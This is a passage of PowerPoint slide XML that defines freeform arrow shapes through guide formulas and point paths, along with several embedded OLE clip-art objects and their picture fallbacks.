                  <a:gd name="T52" fmla="*/ 0 w 985"/>
                  <a:gd name="T53" fmla="*/ 0 h 1832"/>
                  <a:gd name="T54" fmla="*/ 0 w 985"/>
                  <a:gd name="T55" fmla="*/ 0 h 1832"/>
                  <a:gd name="T56" fmla="*/ 0 w 985"/>
                  <a:gd name="T57" fmla="*/ 0 h 1832"/>
                  <a:gd name="T58" fmla="*/ 0 w 985"/>
                  <a:gd name="T59" fmla="*/ 0 h 1832"/>
                  <a:gd name="T60" fmla="*/ 0 w 985"/>
                  <a:gd name="T61" fmla="*/ 0 h 1832"/>
                  <a:gd name="T62" fmla="*/ 0 w 985"/>
                  <a:gd name="T63" fmla="*/ 0 h 1832"/>
                  <a:gd name="T64" fmla="*/ 0 w 985"/>
                  <a:gd name="T65" fmla="*/ 0 h 1832"/>
                  <a:gd name="T66" fmla="*/ 0 w 985"/>
                  <a:gd name="T67" fmla="*/ 0 h 1832"/>
                  <a:gd name="T68" fmla="*/ 0 w 985"/>
                  <a:gd name="T69" fmla="*/ 0 h 1832"/>
                  <a:gd name="T70" fmla="*/ 0 w 985"/>
                  <a:gd name="T71" fmla="*/ 0 h 1832"/>
                  <a:gd name="T72" fmla="*/ 0 w 985"/>
                  <a:gd name="T73" fmla="*/ 0 h 1832"/>
                  <a:gd name="T74" fmla="*/ 0 w 985"/>
                  <a:gd name="T75" fmla="*/ 0 h 1832"/>
                  <a:gd name="T76" fmla="*/ 0 w 985"/>
                  <a:gd name="T77" fmla="*/ 0 h 1832"/>
                  <a:gd name="T78" fmla="*/ 0 w 985"/>
                  <a:gd name="T79" fmla="*/ 0 h 1832"/>
                  <a:gd name="T80" fmla="*/ 0 w 985"/>
                  <a:gd name="T81" fmla="*/ 0 h 1832"/>
                  <a:gd name="T82" fmla="*/ 0 w 985"/>
                  <a:gd name="T83" fmla="*/ 0 h 1832"/>
                  <a:gd name="T84" fmla="*/ 0 w 985"/>
                  <a:gd name="T85" fmla="*/ 0 h 1832"/>
                  <a:gd name="T86" fmla="*/ 0 w 985"/>
                  <a:gd name="T87" fmla="*/ 0 h 1832"/>
                  <a:gd name="T88" fmla="*/ 0 w 985"/>
                  <a:gd name="T89" fmla="*/ 0 h 1832"/>
                  <a:gd name="T90" fmla="*/ 0 w 985"/>
                  <a:gd name="T91" fmla="*/ 0 h 18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5"/>
                  <a:gd name="T139" fmla="*/ 0 h 1832"/>
                  <a:gd name="T140" fmla="*/ 985 w 985"/>
                  <a:gd name="T141" fmla="*/ 1832 h 18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5" h="1832">
                    <a:moveTo>
                      <a:pt x="985" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="964" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="943" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="914" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="893" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="870" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="849" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="827" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="806" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="783" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="757" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="734" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="711" y="83"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="687" y="94"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="662" y="106"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="640" y="118"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="619" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="600" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="156"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="560" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="184"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="200"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="495" y="216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="476" y="230"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="445" y="255"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="414" y="285"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="308"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="340"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="340" y="364"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="318" y="391"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="274" y="449"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="254" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="234" y="513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="214" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="197" y="575"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="181" y="611"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="166" y="646"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="152" y="682"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="139" y="721"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="122" y="769"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111" y="814"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="859"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="904"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="957"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="1022"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="1073"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="1124"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="1172"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="1216"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="97" y="1263"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="107" y="1312"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="120" y="1363"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="137" y="1416"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="1465"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="172" y="1513"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="1560"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="1605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1731"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="1832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="924" y="1207"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="664" y="1347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="639" y="1307"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="623" y="1271"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="609" y="1234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="599" y="1197"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="592" y="1162"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="590" y="1127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="1092"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="586" y="1058"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="589" y="1016"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="593" y="976"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="931"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="612" y="895"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="628" y="855"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="641" y="820"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="660" y="787"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="675" y="761"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="691" y="740"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="707" y="719"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="697"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="743" y="675"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="760" y="659"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="779" y="639"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="798" y="623"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="820" y="607"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="847" y="589"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="869" y="574"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="888" y="563"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="916" y="547"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="943" y="536"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="985" y="524"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="985"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sp>
            <p:nvSpPr>
              <p:cNvPr id="208" name="Freeform 77">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{833CA296-8EC4-6F14-1F4C-41AC7015A8C0}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="2312" y="3312"/>
                <a:ext cx="293" cy="331"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 1464"/>
                  <a:gd name="T1" fmla="*/ 0 h 1658"/>
                  <a:gd name="T2" fmla="*/ 0 w 1464"/>
                  <a:gd name="T3" fmla="*/ 0 h 1658"/>
                  <a:gd name="T4" fmla="*/ 0 w 1464"/>
                  <a:gd name="T5" fmla="*/ 0 h 1658"/>
                  <a:gd name="T6" fmla="*/ 0 w 1464"/>
                  <a:gd name="T7" fmla="*/ 0 h 1658"/>
                  <a:gd name="T8" fmla="*/ 0 w 1464"/>
                  <a:gd name="T9" fmla="*/ 0 h 1658"/>
                  <a:gd name="T10" fmla="*/ 0 w 1464"/>
                  <a:gd name="T11" fmla="*/ 0 h 1658"/>
                  <a:gd name="T12" fmla="*/ 0 w 1464"/>
                  <a:gd name="T13" fmla="*/ 0 h 1658"/>
                  <a:gd name="T14" fmla="*/ 0 w 1464"/>
                  <a:gd name="T15" fmla="*/ 0 h 1658"/>
                  <a:gd name="T16" fmla="*/ 0 w 1464"/>
                  <a:gd name="T17" fmla="*/ 0 h 1658"/>
                  <a:gd name="T18" fmla="*/ 0 w 1464"/>
                  <a:gd name="T19" fmla="*/ 0 h 1658"/>
                  <a:gd name="T20" fmla="*/ 0 w 1464"/>
                  <a:gd name="T21" fmla="*/ 0 h 1658"/>
                  <a:gd name="T22" fmla="*/ 0 w 1464"/>
                  <a:gd name="T23" fmla="*/ 0 h 1658"/>
                  <a:gd name="T24" fmla="*/ 0 w 1464"/>
                  <a:gd name="T25" fmla="*/ 0 h 1658"/>
                  <a:gd name="T26" fmla="*/ 0 w 1464"/>
                  <a:gd name="T27" fmla="*/ 0 h 1658"/>
                  <a:gd name="T28" fmla="*/ 0 w 1464"/>
                  <a:gd name="T29" fmla="*/ 0 h 1658"/>
                  <a:gd name="T30" fmla="*/ 0 w 1464"/>
                  <a:gd name="T31" fmla="*/ 0 h 1658"/>
                  <a:gd name="T32" fmla="*/ 0 w 1464"/>
                  <a:gd name="T33" fmla="*/ 0 h 1658"/>
                  <a:gd name="T34" fmla="*/ 0 w 1464"/>
                  <a:gd name="T35" fmla="*/ 0 h 1658"/>
                  <a:gd name="T36" fmla="*/ 0 w 1464"/>
                  <a:gd name="T37" fmla="*/ 0 h 1658"/>
                  <a:gd name="T38" fmla="*/ 0 w 1464"/>
                  <a:gd name="T39" fmla="*/ 0 h 1658"/>
                  <a:gd name="T40" fmla="*/ 0 w 1464"/>
                  <a:gd name="T41" fmla="*/ 0 h 1658"/>
                  <a:gd name="T42" fmla="*/ 0 w 1464"/>
                  <a:gd name="T43" fmla="*/ 0 h 1658"/>
                  <a:gd name="T44" fmla="*/ 0 w 1464"/>
                  <a:gd name="T45" fmla="*/ 0 h 1658"/>
                  <a:gd name="T46" fmla="*/ 0 w 1464"/>
                  <a:gd name="T47" fmla="*/ 0 h 1658"/>
                  <a:gd name="T48" fmla="*/ 0 w 1464"/>
                  <a:gd name="T49" fmla="*/ 0 h 1658"/>
                  <a:gd name="T50" fmla="*/ 0 w 1464"/>
                  <a:gd name="T51" fmla="*/ 0 h 1658"/>
                  <a:gd name="T52" fmla="*/ 0 w 1464"/>
                  <a:gd name="T53" fmla="*/ 0 h 1658"/>
                  <a:gd name="T54" fmla="*/ 0 w 1464"/>
                  <a:gd name="T55" fmla="*/ 0 h 1658"/>
                  <a:gd name="T56" fmla="*/ 0 w 1464"/>
                  <a:gd name="T57" fmla="*/ 0 h 1658"/>
                  <a:gd name="T58" fmla="*/ 0 w 1464"/>
                  <a:gd name="T59" fmla="*/ 0 h 1658"/>
                  <a:gd name="T60" fmla="*/ 0 w 1464"/>
                  <a:gd name="T61" fmla="*/ 0 h 1658"/>
                  <a:gd name="T62" fmla="*/ 0 w 1464"/>
                  <a:gd name="T63" fmla="*/ 0 h 1658"/>
                  <a:gd name="T64" fmla="*/ 0 w 1464"/>
                  <a:gd name="T65" fmla="*/ 0 h 1658"/>
                  <a:gd name="T66" fmla="*/ 0 w 1464"/>
                  <a:gd name="T67" fmla="*/ 0 h 1658"/>
                  <a:gd name="T68" fmla="*/ 0 w 1464"/>
                  <a:gd name="T69" fmla="*/ 0 h 1658"/>
                  <a:gd name="T70" fmla="*/ 0 w 1464"/>
                  <a:gd name="T71" fmla="*/ 0 h 1658"/>
                  <a:gd name="T72" fmla="*/ 0 w 1464"/>
                  <a:gd name="T73" fmla="*/ 0 h 1658"/>
                  <a:gd name="T74" fmla="*/ 0 w 1464"/>
                  <a:gd name="T75" fmla="*/ 0 h 1658"/>
                  <a:gd name="T76" fmla="*/ 0 w 1464"/>
                  <a:gd name="T77" fmla="*/ 0 h 1658"/>
                  <a:gd name="T78" fmla="*/ 0 w 1464"/>
                  <a:gd name="T79" fmla="*/ 0 h 1658"/>
                  <a:gd name="T80" fmla="*/ 0 w 1464"/>
                  <a:gd name="T81" fmla="*/ 0 h 1658"/>
                  <a:gd name="T82" fmla="*/ 0 w 1464"/>
                  <a:gd name="T83" fmla="*/ 0 h 1658"/>
                  <a:gd name="T84" fmla="*/ 0 w 1464"/>
                  <a:gd name="T85" fmla="*/ 0 h 1658"/>
                  <a:gd name="T86" fmla="*/ 0 w 1464"/>
                  <a:gd name="T87" fmla="*/ 0 h 1658"/>
                  <a:gd name="T88" fmla="*/ 0 w 1464"/>
                  <a:gd name="T89" fmla="*/ 0 h 1658"/>
                  <a:gd name="T90" fmla="*/ 0 w 1464"/>
                  <a:gd name="T91" fmla="*/ 0 h 1658"/>
                  <a:gd name="T92" fmla="*/ 0 w 1464"/>
                  <a:gd name="T93" fmla="*/ 0 h 1658"/>
                  <a:gd name="T94" fmla="*/ 0 w 1464"/>
                  <a:gd name="T95" fmla="*/ 0 h 16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4"/>
                  <a:gd name="T145" fmla="*/ 0 h 1658"/>
                  <a:gd name="T146" fmla="*/ 1464 w 1464"/>
                  <a:gd name="T147" fmla="*/ 1658 h 16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4" h="1658">
                    <a:moveTo>
                      <a:pt x="558" y="243"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="578" y="246"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="604" y="250"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="631" y="257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="650" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="672" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="693" y="274"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="716" y="281"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="736" y="286"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="759" y="295"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="786" y="306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="809" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="831" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="857" y="337"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="882" y="349"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="904" y="360"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="925" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="944" y="385"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="963" y="398"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="984" y="410"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1007" y="426"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1029" y="442"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1049" y="457"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1067" y="472"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1098" y="498"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1129" y="527"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1153" y="549"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1182" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1202" y="605"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1224" y="632"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1249" y="662"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1269" y="691"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1289" y="724"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1310" y="755"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1328" y="789"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1346" y="818"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1362" y="853"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1378" y="888"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1391" y="924"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1405" y="963"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1421" y="1011"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1433" y="1056"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1444" y="1102"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1449" y="1147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1457" y="1199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="1264"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1464" y="1314"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1463" y="1365"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1458" y="1413"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1453" y="1458"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1447" y="1505"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1437" y="1553"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1424" y="1604"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1407" y="1658"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1311" y="1358"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="946" y="1421"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="954" y="1368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="1335"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="957" y="1299"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="955" y="1257"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="949" y="1218"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="942" y="1174"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="932" y="1138"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="916" y="1097"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="902" y="1063"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="884" y="1029"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="868" y="1003"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="853" y="982"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="837" y="961"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="819" y="940"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="799" y="917"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="783" y="902"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="764" y="883"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="745" y="866"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="722" y="849"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="696" y="832"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="673" y="817"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="655" y="806"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="627" y="790"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="602" y="781"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="581" y="773"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="559" y="765"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="757"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="494" y="752"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="748"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="430" y="746"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="745"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="412" y="1015"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="514"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="411" y="231"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="433" y="232"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="465" y="234"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="236"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="239"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="558" y="24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panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="204" name="Object 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFAA31C-845C-F442-518E-2F55148EB4DF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="4128" y="3444"/>
            <a:ext cx="798" cy="612"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s6377" name="Clip" r:id="rId34" imgW="1270571" imgH="967141" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId34" imgW="1270571" imgH="967141" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="204" name="Object 121">
                          <a:extLst>
                            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACFAA31C-845C-F442-518E-2F55148EB4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3444"/>
                          <a:ext cx="79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9" name="Object 122">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0146B7DB-24F6-F495-732D-683BFE3E019C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6480320" y="5590167"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6378" name="Clip" r:id="rId35" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId35" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="209" name="Object 122">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0146B7DB-24F6-F495-732D-683BFE3E01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320" y="5590167"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="210" name="Object 123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{583F9096-51C8-05AC-0F49-CD95E87E847D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6480320" y="4994045"/>
          <a:ext cx="291527" cy="224066"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s6379" name="Clip" r:id="rId36" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Clip" r:id="rId36" imgW="1270571" imgH="967141" progId="">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="210" name="Object 123">
                        <a:extLst>
                          <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                            <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{583F9096-51C8-05AC-0F49-CD95E87E84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320" y="4994045"/>
                        <a:ext cx="291527" cy="224066"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln>
                        <a:noFill/>
                      </a:ln>
